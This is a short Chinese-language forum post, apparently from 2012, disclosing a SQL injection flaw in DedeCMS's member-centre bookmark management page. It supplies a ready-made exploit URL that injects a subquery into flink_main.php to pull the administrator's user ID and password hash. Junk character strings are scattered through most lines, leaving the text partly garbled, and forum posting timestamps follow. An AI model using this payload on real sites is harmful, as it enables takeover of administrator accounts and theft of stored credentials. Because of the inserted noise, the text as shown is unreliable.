DedeCMS会员中心SQL注射漏洞
9 q% n: i. E# T需要magic_quotes_gpc = Off% y6 c0 q( ]1 O/ B* W% s- ~
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码." z0 I# o5 D7 Y6 W5 P* Z/ Q
# n6 |5 t1 Z: r# m
DedeCMS会员中心书签管理SQL注射漏洞+ {, u6 n/ D/ j& o
成功利用该漏洞可获得管理员密码: s8 Z: M4 h4 X- f+ w& R. E
! u; v) R; w6 i+ V3 M会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
7 x+ u+ \& l! n) `4 F / U! B& |: m: W5 V- S
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r# z+ O( ]' ^# c$ L8 `) n0 a
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59